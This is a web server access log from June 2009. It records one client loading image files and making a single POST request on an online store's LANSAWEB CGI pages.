70.61.119.142 - - [10/Jun/2009:08:03:34 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4847526700C17E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:34 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4847526700C17E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:34 -0400] "GET /images/pf-a.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4847526700C17E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:34 -0400] "GET /images/space.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4847526700C17E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:34 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4847526700C17E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:34 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4847526700C17E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:35 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4847526700C17E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:35 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4847526700C17E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:35 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4847526700C17E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:35 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4847526700C17E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:35 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4847526700C17E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:35 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4847526700C17E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:35 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4847526700C17E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:35 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4847526700C17E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:36 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L001F8A424712A700EBBE046+M37+ENG HTTP/1.1" 200 40711 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A4847526700C17E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:08:03:39 -0400] "GET /images/pf-b.gif HTTP/1.1" 200 813 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F8A424712A700EBBE046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
